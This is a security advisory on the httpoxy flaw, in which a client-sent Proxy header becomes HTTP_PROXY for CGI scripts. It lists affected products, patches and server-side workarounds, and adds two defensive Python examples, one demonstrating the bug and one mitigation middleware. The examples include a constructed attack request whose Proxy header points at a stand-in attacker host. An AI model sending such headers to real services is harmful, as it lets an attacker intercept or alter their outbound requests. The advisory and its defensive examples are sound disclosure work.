The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a vigilance database and tools to fix them.

Vulnerability of Web servers: creating client queries via the Proxy header

Synthesis of the vulnerability 

An attacker can send a request carrying a malicious Proxy header to a web service that hosts a CGI script which itself makes outbound HTTP requests, so that those requests are routed through the attacker's proxy.
Vulnerable software: Apache httpd, Tomcat, Mac OS X, Debian, Drupal Core, VNX Operating Environment, VNX Series, eZ Publish, Fedora, HP-UX, QRadar SIEM, Junos Space, NSM Central Manager, NSMXpress, lighttpd, IIS, nginx, openSUSE, openSUSE Leap, Oracle Communications, Solaris, Perl Module ~ not comprehensive, PHP, Python, RHEL, Slackware, SUSE Linux Enterprise Desktop, SLES, Synology DSM, Synology DS***, Synology RS***, TrendMicro ServerProtect, TYPO3 Core, Ubuntu, Varnish.
Severity of this announcement: 3/4.
Number of vulnerabilities in this bulletin: 13.
Creation date: 18/07/2016.
References of this computer vulnerability: 1117414, 1994719, 1994725, 1999671, APPLE-SA-2017-09-25-1, bulletinjul2017, bulletinoct2016, c05324759, CERTFR-2016-AVI-240, CERTFR-2017-AVI-012, CERTFR-2017-AVI-022, cpujan2018, CVE-2016-1000103-REJECT, CVE-2016-1000104, CVE-2016-1000105-REJECT, CVE-2016-1000107, CVE-2016-1000108, CVE-2016-1000109, CVE-2016-1000110, CVE-2016-1000111, CVE-2016-1000212, CVE-2016-5385, CVE-2016-5386, CVE-2016-5387, CVE-2016-5388, DLA-1883-1, DLA-553-1, DLA-568-1, DLA-583-1, DLA-749-1, DRUPAL-SA-CORE-2016-003, DSA-2019-131, DSA-3623-1, DSA-3631-1, DSA-3642-1, EZSA-2016-001, FEDORA-2016-07e9059072, FEDORA-2016-2c324d0670, FEDORA-2016-340e361b90, FEDORA-2016-4094bd4ad6, FEDORA-2016-4e7db3d437, FEDORA-2016-604616dc33, FEDORA-2016-683d0b257b, FEDORA-2016-970edb82d4, FEDORA-2016-9c8cf5912c, FEDORA-2016-9de7253cc7, FEDORA-2016-9fd814a7f2, FEDORA-2016-9fd9bfab9e, FEDORA-2016-a29c65b00f, FEDORA-2016-aef8a45afe, FEDORA-2016-c1b01b9278, FEDORA-2016-df0726ae26, FEDORA-2016-e2c8f5f95a, FEDORA-2016-ea5e284d34, HPSBUX03665, HT207615, HT208144, HT208221, httpoxy, JSA10770, JSA10774, openSUSE-SU-2016:1824-1, openSUSE-SU-2016:2054-1, openSUSE-SU-2016:2055-1, openSUSE-SU-2016:2115-1, openSUSE-SU-2016:2120-1, openSUSE-SU-2016:2252-1, openSUSE-SU-2016:2536-1, openSUSE-SU-2016:3092-1, openSUSE-SU-2016:3157-1, openSUSE-SU-2017:0223-1, openSUSE-SU-2020:0086-1, RHSA-2016:1420-01, RHSA-2016:1421-01, RHSA-2016:1422-01, RHSA-2016:1538-01, RHSA-2016:1609-01, RHSA-2016:1610-01, RHSA-2016:1611-01, RHSA-2016:1612-01, RHSA-2016:1613-01, RHSA-2016:1624-01, RHSA-2016:1626-01, RHSA-2016:1627-01, RHSA-2016:1628-01, RHSA-2016:1629-01, RHSA-2016:1630-01, RHSA-2016:1635-01, RHSA-2016:1636-01, RHSA-2016:1648-01, RHSA-2016:1649-01, RHSA-2016:1650-01, RHSA-2016:1978-01, RHSA-2016:2045-01, RHSA-2016:2046-01, SSA:2016-203-02, SSA:2016-358-01, SSA:2016-363-01, SUSE-SU-2017:1632-1, SUSE-SU-2017:1660-1, SUSE-SU-2019:0223-1, SUSE-SU-2020:0114-1, SUSE-SU-2020:0234-1, USN-3038-1, USN-3045-1, USN-3134-1, USN-3177-1, USN-3177-2, USN-3585-1, VIGILANCE-VUL-20143, VU#797896.

Description of the vulnerability 

Most web servers can run scripts through CGI or a CGI-like interface such as FastCGI (PHP, Python, Perl, Go, etc.).

According to RFC 3875 (the CGI specification), a web server passes every request header to the CGI script as an environment variable named HTTP_ followed by the upper-cased header name with hyphens replaced by underscores. A client-supplied Proxy header therefore becomes the HTTP_PROXY environment variable of the script.

However, HTTP_PROXY is also the conventional variable in which outbound HTTP client libraries look for the proxy they should use. PHP scripts (via Guzzle, Artax, etc.), Python scripts (urllib, requests) and Go programs (net/http) that run under CGI will thus send all the client requests they make during that CGI request through the proxy named in the incoming web request.

An attacker can therefore send a request carrying a malicious Proxy header to a web service that hosts a CGI script which makes outbound HTTP requests, so that those requests are routed through the attacker's proxy, where they can be read or altered.
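The mechanism described above, as an added example that is not part of the Vigil@nce bulletin nor of any of the listed vendors' code: the RFC 3875 mapping that turns a "Proxy:" request header into HTTP_PROXY, a proxy resolver with the pre-fix behaviour next to the hardened rule that the Python and Go standard libraries adopted (ignore HTTP_PROXY when REQUEST_METHOD is set, because that means the process is a CGI script), and a call to urllib's own resolver to show the fix in the shipped library. The request, hostnames and script path are constructed placeholders.

```python
"""
Added example (not part of the Vigil@nce bulletin): how a client-supplied
"Proxy" request header becomes HTTP_PROXY under CGI, why an outbound HTTP
client then honours it, and the check that fixed urllib and net/http:
ignore HTTP_PROXY when REQUEST_METHOD is set.
"""
import os
from unittest.mock import patch
from urllib.request import getproxies_environment

# Constructed sample request: the attacker adds a "Proxy" header.
# Hostnames are placeholders, not real hosts.
ATTACKER_REQUEST = (
    "GET /cgi-bin/fetch.py HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "Proxy: http://attacker.example:8080\r\n"
    "User-Agent: curl/7.47.0\r\n"
    "\r\n"
)


def cgi_environ_from_request(raw_request):
    """Build the RFC 3875 meta-variables a web server hands to a CGI script.
    The request line becomes REQUEST_METHOD etc., and every header becomes
    HTTP_<NAME>, upper-cased, hyphens turned into underscores. This is the
    generic rule that turns "Proxy:" into HTTP_PROXY."""
    head, _, _body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    env = {
        "GATEWAY_INTERFACE": "CGI/1.1",
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": target.split("?", 1)[0],
        "QUERY_STRING": target.partition("?")[2],
        "SERVER_PROTOCOL": version,
    }
    for line in lines[1:]:
        name, _, value = line.partition(":")
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env


def proxy_for_outbound_request_vulnerable(env):
    """Pre-fix behaviour: trust HTTP_PROXY wherever it came from.
    Under CGI the value is attacker-controlled."""
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def proxy_for_outbound_request_fixed(env):
    """Hardened rule: in a CGI context (REQUEST_METHOD present) an upper-case
    HTTP_PROXY can only have come from a request header, so drop it.
    A lower-case http_proxy cannot be set by a client, because RFC 3875
    meta-variables are always upper-case, so a legitimately configured
    egress proxy keeps working. Caveat: on Windows, environment variable
    names are case-insensitive, so there the web server itself must strip
    the header (see the IIS workaround in the Solutions section)."""
    if "REQUEST_METHOD" in env:
        return env.get("http_proxy")
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def stdlib_proxies(env):
    """Run urllib's own resolver against a synthetic process environment
    (os.environ is replaced only for the duration of the call). Python
    2.7.12 / 3.4.5 / 3.5.2 and later apply the REQUEST_METHOD rule above."""
    with patch.dict(os.environ, env, clear=True):
        return getproxies_environment()


if __name__ == "__main__":
    env = cgi_environ_from_request(ATTACKER_REQUEST)
    print("HTTP_PROXY in CGI environment:", env.get("HTTP_PROXY"))
    print("vulnerable client would use:  ", proxy_for_outbound_request_vulnerable(env))
    print("fixed client uses:            ", proxy_for_outbound_request_fixed(env))
    print("urllib sees:                  ", stdlib_proxies(env))
```

Running the script on an unpatched interpreter prints the attacker's proxy on the last line as well; on a patched one, urllib returns an empty mapping for the CGI environment while still honouring HTTP_PROXY when REQUEST_METHOD is absent (a normal command-line process).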
Full bulletin, software filtering, emails, fixes, ... (Request your free trial)

This computer vulnerability alert impacts software or systems such as Apache httpd, Tomcat, Mac OS X, Debian, Drupal Core, VNX Operating Environment, VNX Series, eZ Publish, Fedora, HP-UX, QRadar SIEM, Junos Space, NSM Central Manager, NSMXpress, lighttpd, IIS, nginx, openSUSE, openSUSE Leap, Oracle Communications, Solaris, Perl Module ~ not comprehensive, PHP, Python, RHEL, Slackware, SUSE Linux Enterprise Desktop, SLES, Synology DSM, Synology DS***, Synology RS***, TrendMicro ServerProtect, TYPO3 Core, Ubuntu, Varnish.

Our Vigil@nce team determined that the severity of this computer threat alert is important.

The trust level is: confirmed by the vendor. The attack origin is: internet client.

This bulletin is about 13 vulnerabilities.

A proof of concept or an attack tool is available, so your teams have to process this alert. An attacker with technician-level skills can exploit this vulnerability.

Solutions for this threat 

Apache httpd: workaround for httpoxy.
Apache httpd is vulnerable only if it runs scripts through a CGI-style interface (PHP, mod_cgi, mod_fcgid, mod_perl, etc.).
A workaround is to add in httpd.conf:
  LoadModule headers_module {path-to}/mod_headers.so
  RequestHeader unset Proxy early
A workaround is to add in mod_security:
  SecRuleEngine On
  SecRule &REQUEST_HEADERS:Proxy "@gt 0" "id:1000005,log,deny,msg:'httpoxy denied'"

Apache Tomcat: version 8.5.5.
The version 8.5.5 is fixed:
  http://tomcat.apache.org/download-80.cgi

Apache Tomcat: version 8.0.37.
The version 8.0.37 is fixed:
  http://tomcat.apache.org/download-80.cgi

Apache Tomcat: version 7.0.72.
The version 7.0.72 is fixed:
  http://tomcat.apache.org/

Apache Tomcat: version 6.0.47.
The version 6.0.47 is fixed:
  http://tomcat.apache.org/download-60.cgi

Apache Tomcat: workaround for httpoxy.
Apache Tomcat is vulnerable only if it uses a CGI framework (PHP, etc.).
A workaround is indicated in the information source.

Apache httpd: version 2.4.25.
The version 2.4.25 is fixed:
  http://apache.mediamirrors.org//httpd/httpd-2.4.25.tar.bz2

Apple macOS 10.12: version Security Update 2017-001.
The version Security Update 2017-001 is fixed:
  https://support.apple.com/

Apple macOS: version 10.13.
The version 10.13 is fixed:
  https://www.apple.com/support/downloads/

Apple macOS: version 10.13.1.
The version 10.13.1 is fixed:
  https://support.apple.com/

Apple MacOS X 10.11: version Security Update 2017-004.
The version Security Update 2017-004 is fixed:
  https://support.apple.com/

Apple Mac OS X: version 10.12.4.
The version 10.12.4 is fixed.

Debian 7: new php5 packages.
New packages are available:
  Debian 7: php5 5.4.45-0+deb7u6

Debian 7: new wordpress packages (01/08/2016).
New packages are available:
  Debian 7: wordpress 3.6.1+dfsg-1~deb7u11

Debian 8: new php5 packages.
New packages are available:
  Debian 8: php5 5.6.24+dfsg-0+deb8u1

Debian 8: new tomcat8 packages.
New packages are available:
  Debian 8: tomcat8 8.0.14-1+deb8u15

Debian: new apache2 packages.
New packages are available:
  Debian 7: apache2 2.2.22-13+deb7u7
  Debian 8: apache2 2.4.10-10+deb8u5

Debian: new lighttpd packages.
New packages are available:
  Debian 7: lighttpd 1.4.31-4+deb7u5
  Debian 8: lighttpd 1.4.35-4+deb8u1

Dell EMC VNXe3200: version 3.1.10.9946299.
The version 3.1.10.9946299 is fixed:
  https://www.dell.com/

Drupal Core: version 8.1.7.
The version 8.1.7 is fixed:
  https://www.drupal.org/project/drupal/releases/8.1.7

eZ Publish: solution for GuzzleHttp.
GuzzleHttp has to be updated with:
  php -d memory_limit=-1 composer.phar update

Fedora 23: new python packages.
New packages are available:
  Fedora 23: python 2.7.11-8.fc23

Fedora 24: new python packages.
New packages are available:
  Fedora 24: python 2.7.12-2.fc24

Fedora: new golang packages.
New packages are available:
  Fedora 23: golang 1.5.4-2.fc23
  Fedora 24: golang 1.6.3-1.fc24

Fedora: new httpd packages.
New packages are available:
  Fedora 23: httpd 2.4.23-4.fc23
  Fedora 24: httpd 2.4.23-4.fc24

Fedora: new lighttpd packages.
New packages are available:
  Fedora 23: lighttpd 1.4.41-1.fc23
  Fedora 24: lighttpd 1.4.41-1.fc24

Fedora: new perl-CGI-Emulate-PSGI packages.
New packages are available:
  Fedora 23: perl-CGI-Emulate-PSGI 0.22-1.fc23
  Fedora 24: perl-CGI-Emulate-PSGI 0.22-1.fc24

Fedora: new php-guzzlehttp-guzzle6 packages.
New packages are available:
  Fedora 23: php-guzzlehttp-guzzle6 6.2.1-1.fc23
  Fedora 24: php-guzzlehttp-guzzle6 6.2.1-1.fc24

Fedora: new php-guzzlehttp-guzzle packages.
New packages are available:
  Fedora 23: php-guzzlehttp-guzzle 5.3.1-1.fc23
  Fedora 24: php-guzzlehttp-guzzle 5.3.1-1.fc24

Fedora: new python3 packages.
New packages are available:
  Fedora 23: python3 3.4.3-12.fc23
  Fedora 24: python3 3.5.1-13.fc24

Fedora: new tomcat packages.
New packages are available:
  Fedora 23: tomcat 8.0.38-1.fc23
  Fedora 24: tomcat 8.0.38-1.fc24

HP-UX Tomcat: version 7.0.70.01.
The version 7.0.70.01 is fixed:
  https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXWSATW501

IBM Cognos Business Intelligence: solution.
The solution is indicated in information sources.

IBM QRadar SIEM: patch.
A patch is indicated in information sources.

Juniper NSM Appliance: patch for Upgrade Package v3.
A patch is available:
  http://www.juniper.net/support/downloads/?p=nsm#sw

Junos Space: version 16.1R1.
The version 16.1R1 is fixed:
  https://www.juniper.net/

lighttpd: version 1.4.41.
The version 1.4.41 is fixed:
  http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.41.tar.gz

Microsoft IIS: workaround for httpoxy.
Microsoft IIS is vulnerable only if it runs scripts through a CGI/FastCGI interface (PHP, etc.).
A workaround is to add the following rule in applicationHost.config (this requires the IIS URL Rewrite module):
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="Erase HTTP_PROXY" patternSyntax="Wildcard">
          <match url="*.*" />
          <serverVariables>
            <set name="HTTP_PROXY" value="" />
          </serverVariables>
          <action type="None" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>

Nginx: workaround for httpoxy.
Nginx is vulnerable only if it passes requests to a CGI/FastCGI backend (PHP-FPM, etc.) or proxies them to an application server that exposes headers as environment variables.
A workaround is to add in the configuration of Nginx/FastCGI:
  fastcgi_param HTTP_PROXY "";
A workaround is to add in the configuration of proxy_pass:
  proxy_set_header Proxy "";

openSUSE Leap 15.1: new python3 packages (22/01/2020).
New packages are available:
  openSUSE Leap 15.1: python3 3.6.10-lp151.6.7.1

openSUSE Leap 42.1: new squid packages.
New packages are available:
  openSUSE Leap 42.1: squid 3.3.14-12.1

openSUSE Leap 42.1: new tomcat packages.
New packages are available:
  openSUSE Leap 42.1: tomcat 8.0.32-8.1

openSUSE Leap: new php7 packages.
New packages are available:
  openSUSE Leap 42.2: php7 7.0.7-6.2, apache2-mod_php7 7.0.7-6.2

openSUSE: new apache2-mod_fcgid packages.
New packages are available:
  openSUSE 13.2: apache2-mod_fcgid 2.3.9-2.5.1
  openSUSE Leap 42.1: apache2-mod_fcgid 2.3.9-7.1

openSUSE: new apache2 packages.
New packages are available:
  openSUSE 13.2: apache2 2.4.10-31.1
  openSUSE Leap 42.1: apache2 2.4.16-12.1

openSUSE: new python3 packages.
New packages are available:
  openSUSE 13.2: python3 3.4.5-4.4.1
  openSUSE Leap 42.1: python3 3.4.5-8.1

openSUSE: new python-Twisted packages.
New packages are available:
  openSUSE Leap 42.1: python-Twisted 15.4.0-3.1

Oracle Communications: CPU of January 2018.
A Critical Patch Update is available:
  http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Oracle Solaris: patch for third party software of July 2017 v1.
A patch is available:
  https://support.oracle.com/rs?type=doc&id=1448883.1

Perl CGI-Emulate-PSGI: version 0.22.
The version 0.22 is fixed:
  http://search.cpan.org/dist/CGI-Emulate-PSGI/lib/CGI/Emulate/PSGI.pm

Red Hat JBoss Web Server: version 2.1.1.
The version 2.1.1 is fixed:
  https://access.redhat.com/documentation/en-US/Red_Hat_JBoss_Web_Server/2.1/html/2.1.1_Release_Notes/index.html

Red Hat JBoss Web Server: version 3.0.3 Service Pack 1.
The version 3.0.3 Service Pack 1 is fixed:
  https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=3.0.3

RHEL 6.8: new php packages.
New packages are available:
  RHEL 6: php 5.3.3-48.el6_8

RHEL 6.8: new tomcat6 packages.
New packages are available:
  RHEL 6: tomcat6 6.0.24-98.el6_8

RHEL 7.2: new golang packages.
New packages are available:
  RHEL 7: golang 1.6.3-1.el7_2.1

RHEL 7.2: new php packages.
New packages are available:
  RHEL 7: php 5.4.16-36.3.el7_2

RHEL 7.2: new tomcat packages.
New packages are available:
  RHEL 7: tomcat 7.0.54-8.el7_2

RHEL 7: new rh-python35-python packages.
New packages are available:
  RHEL 7: rh-python35-python 3.5.1-9.el7

RHEL: new httpd24-httpd packages.
New packages are available:
  RHEL 6: httpd24-httpd 2.4.18-11.el6
  RHEL 7: httpd24-httpd 2.4.18-11.el7

RHEL: new httpd packages.
New packages are available:
  RHEL 5: httpd 2.2.3-92.el5_11
  RHEL 6: httpd 2.2.15-54.el6_8
  RHEL 7: httpd 2.4.6-40.el7_2.4

RHEL: new php54-php packages.
New packages are available:
  RHEL 6: php54-php 5.4.40-4.el6
  RHEL 7: php54-php 5.4.40-4.el7

RHEL: new php55-php packages.
New packages are available:
  RHEL 6: php55-php 5.5.21-5.el6
  RHEL 7: php55-php 5.5.21-5.el7

RHEL: new python27-python packages.
New packages are available:
  RHEL 6: python27-python 2.7.8-18.el6
  RHEL 7: python27-python 2.7.8-16.el7

RHEL: new python33-python packages.
New packages are available:
  RHEL 6: python33-python 3.3.2-18.el6
  RHEL 7: python33-python 3.3.2-16.el7

RHEL: new python packages.
New packages are available:
  RHEL 6: python 2.6.6-66.el6_8
  RHEL 7: python 2.7.5-38.el7_2

RHEL: new python-twisted-web packages.
New packages are available:
  RHEL 6: python-twisted-web 8.2.0-5.el6_8
  RHEL 7: python-twisted-web 12.1.0-5.el7_2

RHEL: new rh-php56-php packages.
New packages are available:
  RHEL 6: rh-php56-php 5.6.5-9.el6
  RHEL 7: rh-php56-php 5.6.5-9.el7

RHEL: new rh-python34-python packages.
New packages are available:
  RHEL 6: rh-python34-python 3.4.2-14.el6

Slackware: new httpd packages.
New packages are available:
  Slackware 14.0: httpd 2.4.25-*-1_slack14.0
  Slackware 14.1: httpd 2.4.25-*-1_slack14.1
  Slackware 14.2: httpd 2.4.25-*-1_slack14.2

Slackware: new php packages.
New packages are available:
  Slackware 14.0: php 5.6.24-*-1_slack14.0
  Slackware 14.1: php 5.6.24-*-1_slack14.1
  Slackware 14.2: php 5.6.24-*-1_slack14.2

Slackware: new python packages.
New packages are available:
  Slackware 14.0: python 2.7.13-*-1_slack14.0
  Slackware 14.1: python 2.7.13-*-1_slack14.1
  Slackware 14.2: python 2.7.13-*-1_slack14.2

Solaris: patch for third party software of October 2016 v1.
A patch is available:
  https://support.oracle.com/rs?type=doc&id=1448883.1

Solaris: patch for third party software of October 2016 v2.
A patch is available:
  https://support.oracle.com/rs?type=doc&id=1448883.1

SUSE LE 11: new tomcat6 packages.
New packages are available:
  SUSE LE 11 SP3: tomcat6 6.0.53-0.56.1
  SUSE LE 11 SP4: tomcat6 6.0.53-0.56.1

SUSE LE 12: new go1.4 packages.
New packages are available:
  SUSE LE 12 RTM/SP1: go1.4 1.4.3-6.1

SUSE LE 12 RTM: new python packages.
New packages are available:
  SUSE LE 12 RTM: python 2.7.9-16.7.1

SUSE LE 12 RTM: new tomcat packages.
New packages are available:
  SUSE LE 12 RTM: tomcat 7.0.78-7.13.4

SUSE LE 15: new python3 packages (16/01/2020).
New packages are available:
  SUSE LE 15 RTM: python3 3.6.10-3.42.2
  SUSE LE 15 SP1: python3 3.6.10-3.42.2

SUSE LE 15: new python packages (27/01/2020).
New packages are available:
  SUSE LE 15 RTM: python 2.7.17-7.32.2
  SUSE LE 15 SP1: python 2.7.17-7.32.2

SUSE: new go packages.
New packages are available:
  openSUSE 13.2: go 1.4.3-18.1
  openSUSE Leap 42.1: go 1.6.2-21.1
  SUSE LE 12 RTM: go 1.6.1-6.1

Synology DS/RS: workaround for HTTPoxy.
A workaround is indicated in the information source.

Trend Micro ServerProtect: version 3.0.1531.
The version 3.0.1531 is fixed:
  http://files.trendmicro.com/products/splx/product%20patch/splx_30_lx_en_criticalpatch1531.tar.gz

TYPO3 Core: version 8.2.1.
The version 8.2.1 is fixed:
  https://typo3.org/download/

Ubuntu: new apache2 packages.
New packages are available:
  Ubuntu 16.04 LTS: apache2-bin 2.4.18-2ubuntu3.1
  Ubuntu 15.10: apache2-bin 2.4.12-2ubuntu2.1
  Ubuntu 14.04 LTS: apache2.2-bin 2.4.7-1ubuntu4.13
  Ubuntu 12.04 LTS: apache2.2-bin 2.2.22-1ubuntu1.11

Ubuntu: new php packages (03/08/2016).
New packages are available:
  Ubuntu 16.04 LTS: libapache2-mod-php7.0 7.0.8-0ubuntu0.16.04.2, php 7.0.8-0ubuntu0.16.04.2
  Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.19, php 5.5.9+dfsg-1ubuntu4.19
  Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.24, php 5.3.10-1ubuntu3.24

Ubuntu: new python packages.
New packages are available:
  Ubuntu 16.04 LTS: python2.7 2.7.12-1ubuntu0~16.04.1, python3.5 3.5.2-2ubuntu0~16.04.1
  Ubuntu 14.04 LTS: python2.7 2.7.6-8ubuntu0.3, python3.4 3.4.3-1ubuntu1~14.04.5
  Ubuntu 12.04 LTS: python2.7 2.7.3-0ubuntu3.9, python3.2 3.2.3-0ubuntu3.8

Ubuntu: new python-twisted packages.
New packages are available:
  Ubuntu 16.04 LTS: python-twisted 16.0.0-1ubuntu0.2
  Ubuntu 14.04 LTS: python-twisted 13.2.0-1ubuntu1.2

Ubuntu: new tomcat packages.
New packages are available:
  Ubuntu 16.10: tomcat8 8.0.37-1ubuntu0.1
  Ubuntu 16.04 LTS: tomcat8 8.0.32-1ubuntu1.3
  Ubuntu 14.04 LTS: tomcat7 7.0.52-1ubuntu0.9
  Ubuntu 12.04 LTS: tomcat6 6.0.35-1ubuntu3.10

Varnish: workaround for httpoxy.
A workaround is to add in the configuration:
  sub vcl_recv {
    [...]
    unset req.http.proxy;
    [...]
  }
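The httpd, nginx, IIS and Varnish fragments above all remove the Proxy header (or the HTTP_PROXY variable) at the web server, before any script runs. As an added example that is not part of the bulletin nor of any listed project, the same strip done one layer down, inside a Python WSGI application, for the case where the front server has not yet been reconfigured. The application, request and hook are constructed for the demonstration.

```python
"""
Added example (not part of the Vigil@nce bulletin): application-level
httpoxy mitigation as a WSGI middleware. It removes HTTP_PROXY (the CGI form
of a client-supplied "Proxy:" header) from the WSGI environ before the
application, and any HTTP client library it calls, can read it, and it
reports each stripped value so the event can be logged or alerted on.
"""

# Meta-variables derived from client headers that an outbound HTTP client
# might mistake for process configuration. Only the Proxy header is known to
# collide (httpoxy); the tuple exists so the list can grow.
CLIENT_CONTROLLED_PROXY_VARS = ("HTTP_PROXY",)


class StripProxyHeader:
    """WSGI middleware: drop attacker-settable proxy variables from environ
    and call on_stripped(environ, name, value) for each one removed."""

    def __init__(self, app, on_stripped=None):
        self.app = app
        self.on_stripped = on_stripped or (lambda environ, name, value: None)

    def __call__(self, environ, start_response):
        for name in CLIENT_CONTROLLED_PROXY_VARS:
            if name in environ:
                value = environ.pop(name)
                self.on_stripped(environ, name, value)
        return self.app(environ, start_response)


def constructed_app(environ, start_response):
    """Stand-in for an application that makes outbound requests: it echoes
    the proxy a pre-fix client library would pick up from HTTP_PROXY."""
    proxy = environ.get("HTTP_PROXY", "<none>")
    body = ("outbound proxy: " + proxy).encode()
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("Content-Length", str(len(body)))])
    return [body]


def run_request(app, environ):
    """Minimal in-process WSGI driver: returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = headers

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


def attacker_environ():
    """Constructed WSGI environ for a request carrying a malicious Proxy
    header (hostnames are placeholders)."""
    return {
        "REQUEST_METHOD": "GET",
        "PATH_INFO": "/fetch",
        "SERVER_PROTOCOL": "HTTP/1.1",
        "HTTP_HOST": "victim.example",
        "HTTP_PROXY": "http://attacker.example:8080",
        "HTTP_USER_AGENT": "curl/7.47.0",
    }


def demo():
    """Send the same request through the bare app and through the
    middleware; return both bodies and the values the hook observed."""
    seen = []
    guarded = StripProxyHeader(
        constructed_app,
        on_stripped=lambda env, name, value: seen.append((name, value)))
    _, _, bare = run_request(constructed_app, attacker_environ())
    _, _, safe = run_request(guarded, attacker_environ())
    return bare, safe, seen


if __name__ == "__main__":
    bare, safe, seen = demo()
    print("without middleware:", bare.decode())
    print("with middleware:   ", safe.decode())
    print("stripped:", seen)
```

This protects only what the application reads from the WSGI environ. Under plain CGI, or under servers that copy request meta-variables into the real process environment, a library that consults os.environ directly still sees HTTP_PROXY, so the server-side strip remains the mitigation to deploy first; the middleware is a stopgap and a detection point, not a replacement.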
